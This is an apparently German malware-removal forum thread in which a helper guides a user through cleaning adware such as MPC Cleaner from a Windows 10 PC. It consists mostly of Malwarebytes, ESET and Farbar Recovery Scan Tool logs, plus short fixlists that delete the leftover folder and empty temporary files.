PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings\eb83a39e-2542-4b9b-8f15-92b074184ca6, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps\webapps.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.CleanBrowser, C:\Windows\run.vbs, In Quarantäne, [168fd9d90e8bd3633d90333fcd3801ff],

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
ESET Log

Code:
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=init
# utc_time=2016-04-24 08:16:29
# local_time=2016-04-24 10:16:29 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Init
Update Download
Update Finalize
Updated modules version: 29220
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=updated
# utc_time=2016-04-24 08:18:40
# local_time=2016-04-24 10:18:40 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# engine=29220
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-04-24 09:07:05
# local_time=2016-04-24 11:07:05 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 26664 15346168 0 0
# scanned=350882
# found=47
# cleaned=0
# scan_time=2905
sh=B00D7D54417F83530AB41C1D45CECB48DC796FCF ft=1 fh=e9dfcaac72e84e00 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinApi.dll"
sh=5ADCA9DD3BF59F20C0B0CBB12D35F2EF0849982A ft=1 fh=66c61548f23272de vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinUsbApi.dll"
sh=1A61B312A4C24359798ED1DCA279564AB10A4809 ft=1 fh=096b4dbafc5e1e8c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AndriodServer.dll"
sh=9B3DB936D99C7E4068AB0EE40D01A3EA12F93516 ft=1 fh=7237caf261b5e620 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\BrowserPlugIn.dll"
sh=47B0D6CD29DDD112644FDBEEFC5FBA12BD4454F0 ft=1 fh=c1eed43ba38a9c9c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Cleaner.dll"
sh=523D9F4DD4F306213D7F391E5F09ED617AB8AC9E ft=1 fh=6ac48a109c808eae vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Database.dll"
sh=563CA7FA5E43EF24D45268B58AA2678C69D4979D ft=1 fh=538485d7e2a3acd4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LogReport.dll"
sh=43A933E2395C4A3C1A70EF0120B7F32FB614E15B ft=1 fh=7525d64b17104be4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LpcManager.dll"
sh=E50E257A2772B05ABDC5B1301348F3A7BCD31037 ft=1 fh=2b8d001a6e136e5f vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Monitor.dll"
sh=38AC9F35E07275308456A86AB74010ACFBE697C4 ft=1 fh=9c4a371b2e91dd7c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe"
sh=D8369B07B0B92C86C7DECE8665EA79940841BA10 ft=1 fh=a8ac21aeacc5ea50 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll"
sh=73D9CF58402E2A780E175B88518645DEC6FC4468 ft=1 fh=30e0ff1cd945f251 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll64.dll"
sh=937836780BB991A61B3FC9EE896D85933B0B931F ft=1 fh=bde1161c33ed8972 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray.exe"
sh=803B51C4D42E07BB41210CD4E01DFC213C9901DA ft=1 fh=a69f57b34d489c4e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray64.exe"
sh=1CADB36329505892F0578833C2910E84C716269E ft=1 fh=642d361fe7b3a003 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Report.dll"
sh=47BEF3747FF0703C5710E292DC6FA29E1739425F ft=1 fh=9a9663366bd79724 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi.dll"
sh=37CB7B8ECF1AC40532B00988BD3141724AEE6AA4 ft=1 fh=ebeadf3162756b74 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi64.dll"
sh=1370B0833D91FA5D4734629896AD2A8A6BC7E66C ft=1 fh=496a06b43d427a62 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeProtect.dll"
sh=53D8EE4FB02CAACC0253A6BFA01D309B437D7D20 ft=1 fh=c6a53c3acb635f13 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Support.dll"
sh=E0FC6B43F8FAC1C0D1037887E5EAF7B1F9C5F86A ft=1 fh=8749ca99a46fe69d vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\TrayFrame.dll"
sh=9FA4D99DE311E69F934643135F8EE32E44A98C41 ft=1 fh=ce96516d72baed57 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Update.dll"
sh=82C95690C090EC05FDE21F4372A8013DC9E7A281 ft=1 fh=4dee74180afd3662 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Utility.dll"
sh=86C97042F4A378EBA06C0F54D825F096B04CFC91 ft=1 fh=46ca724fc3cb0448 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Web.dll"
sh=F46740D4E2A0F7748FD7CACDFA827A93EE1E28C3 ft=1 fh=bb6779a801af24b3 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\WinService.dll"
sh=28EA52315FD6208C147068209C15A8CC69D2BFBE ft=1 fh=c1508f70874092d8 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XBus.dll"
sh=A53E3FDC66DD1978D4B1E8C589BD42AAF81EA52A ft=1 fh=d751568959b41da2 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XProcessBus.dll"
sh=73014EDE7B750F44B574947F3EDA1DB2BDB7344E ft=1 fh=b5af38d973c2376e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XSkin.dll"
sh=7BBA403FF536FCD057B03BC6C6DD60B30818E26F ft=1 fh=fbba1c879bfefdec vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCBase_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt.sys"
sh=75862FCA547282A04952F2AD1235A86A244D5BF5 ft=1 fh=b37c7f3bc1f3bf89 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_64.sys"
sh=659F5A30DA39FEAE4B3EE7F0C40A24222AA3E27E ft=1 fh=4f1ab3efc78c0f94 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_xp_32.sys"
sh=7FA3746CD92CF822FFA1D3AF4F0304655A7FA69F ft=1 fh=f7f39426f0cf8013 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Exe\ADC_qd00000.exe"
sh=27E6143704C268FD62E0184A7CFD9A5C3D2F411F ft=1 fh=975a97365d488128 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcm90.dll"
sh=8C861BA6F67B5455E787744720E69BCBB26CE772 ft=1 fh=5a66b0f4caa7c850 vn="Variante von Win32/Speedchecker.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUSD.exe.vir"
sh=CDD586DF54134E12C80C4D432F3DDBDFABD5E58F ft=1 fh=0e6624e2656c8b93 vn="Variante von Win32/Speedchecker.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUService.exe.vir"
sh=9B1F08431B8B0B259516C077B3360B8ED9DFDA0D ft=1 fh=95fadfb541ab9fba vn="Variante von Win32/Speedchecker.E evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUUCC.exe.vir"
sh=FD837CAF99F57B70A0E2AA9CFE6CC57B93BB02BD ft=1 fh=3a5f7428b641ef39 vn="Variante von Win32/Obfuscated.NFU Trojaner" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\QQBrowser\Update\0AD0C687FD476CAE2DF5F47FFC66340E\Update\chrome_elf.dll.vir"
sh=F5521AE7653644E27EB15E6E59F207F5F2942757 ft=1 fh=585623a91aaa5c22 vn="Win32/ELEX.HV evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ihpul.exe.vir"
sh=ADBC200F6EEABA9A36744339919BCA923ED9B16A ft=1 fh=c71c0011b7c271b9 vn="Variante von Win32/ELEX.HS evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\wpm.exe.vir"
sh=754AE20F48D2621ECA30FF494813463E589D7ED0 ft=0 fh=0000000000000000 vn="Variante von Win32/Speedchecker.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Harun\AppData\Local\Microsoft\Silverlight\OutOfBrowser\Speedchecker.PCSpeedUp\application.xap.vir"
sh=7E74FDF657B1A8803984F03AF74CD2D7DDAB620E ft=1 fh=46cd8c74ebc47fc9 vn="Variante von Win32/ELEX.HQ evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_update.dll"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\index.html"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js"
Checkup

Code:
Results of screen317's Security Check version 1.009 
  x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
Windows Defender 
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 AVG PC TuneUp 
 Java 8 Update 51 
 Java version 32-bit out of Date!
 Mozilla Firefox (41.0.2)
 Google Chrome (49.0.2623.110)
 Google Chrome (49.0.2623.112)
````````Process Check: objlist.exe by Laurent```````` 
 Windows Defender MSMpEng.exe
 Malwarebytes Anti-Malware mbamservice.exe 
 Malwarebytes Anti-Malware mbam.exe 
 Malwarebytes Anti-Malware mbamscheduler.exe 
 Windows Defender MpCmdRun.exe 
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C:  %
````````````````````End of Log``````````````````````

cosinus 25.04.2016 10:10
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
A:\Program Files (x86)\MPC Cleaner

emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 25.04.2016 16:23
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-25 17:19:10) Run:4
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
A:\Program Files (x86)\MPC Cleaner

emptytemp:
       
*****************

A:\Program Files (x86)\MPC Cleaner => Fehler: Kein automatisierter Fix für diesen Eintrag gefunden.
EmptyTemp: => 537 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

cosinus 26.04.2016 08:24
Zitat:
A:\Program Files (x86)\MPC Cleaner => Fehler: Kein automatisierter Fix für diesen Eintrag gefunden.
Der konnte diesen Schrottordner nicht löschen. Prüf mal ob der Ordner überhaupt noch vorhanden ist.

StOony 26.04.2016 16:01
Der Ordner ist noch da. Ich versuche das nochmal zu machen

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-26 16:59:36) Run:5
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
A:\Program Files (x86)\MPC Cleaner

emptytemp:
       
*****************

A:\Program Files (x86)\MPC Cleaner => Fehler: Kein automatisierter Fix für diesen Eintrag gefunden.
EmptyTemp: => 296.1 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 16:59:37 ====

StOony 26.04.2016 16:06
Liste der Anhänge anzeigen (Anzahl: 1)
Hab dir ein Bild gemacht

cosinus 26.04.2016 16:09
:wtf: hm, noch ein Versuch


FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
"A:\Program Files (x86)\MPC Cleaner"
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 26.04.2016 16:13
Liste der Anhänge anzeigen (Anzahl: 1)
Hat wieder nicht funktioniert :(

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-26 17:11:00) Run:6
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
"A:\Program Files (x86)\MPC Cleaner"
emptytemp:
       
*****************

"A:\Program Files (x86)\MPC Cleaner" => Fehler: Kein automatisierter Fix für diesen Eintrag gefunden.
EmptyTemp: => 25.2 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 17:11:01 ====
EDIT:

So mache ich es.. Siehe anhang.

Dann drücke ich auf entfernen..

StOony 26.04.2016 16:19
Ich war mal so frei und hab im Text bereich des Programmes wo Suchen steht ->A:\Program Files (x86)\MPC Cleaner eingegeben und auf suchen geklickt, dies ist dabei rausgekommen..

Code:
Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-26 17:17:33)
Gestartet von C:\Users\Harun\Downloads
Start-Modus: Normal

================== Datei-Suche: "A:\Program Files (x86)\MPC Cleaner" =============

====== Ende von Suche ======

cosinus 27.04.2016 09:42
Zitat:
Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.43 GB) NTFS
Was für eine Platte ist das eigentlich bei dir?
Ne Backupplatte?

StOony 27.04.2016 16:33
Das einfach noch ne Festplatte, da meine SSD nur 64 GB hat(muss ich mal aufrüsten^^) hab ich ne 1TB HDD drinne.
Dort hab ich eben Games drauf, etc..

Außerdem ein Ordner mit Program Files (x86) wo der MPC Cleaner Ordner drinne ist und Origin Games, aber das ist normal

cosinus 27.04.2016 22:03
Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

StOony 28.04.2016 20:52
FRST erster Teil

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (28-04-2016 21:46:46)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596504 2016-04-01] (Oracle Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()
GroupPolicyUsers\S-1-5-21-2630849102-760198568-3561441068-1004\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1
ManualProxies:

Internet Explorer:
==================
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_91\bin\ssv.dll [2016-04-26] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-04-26] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
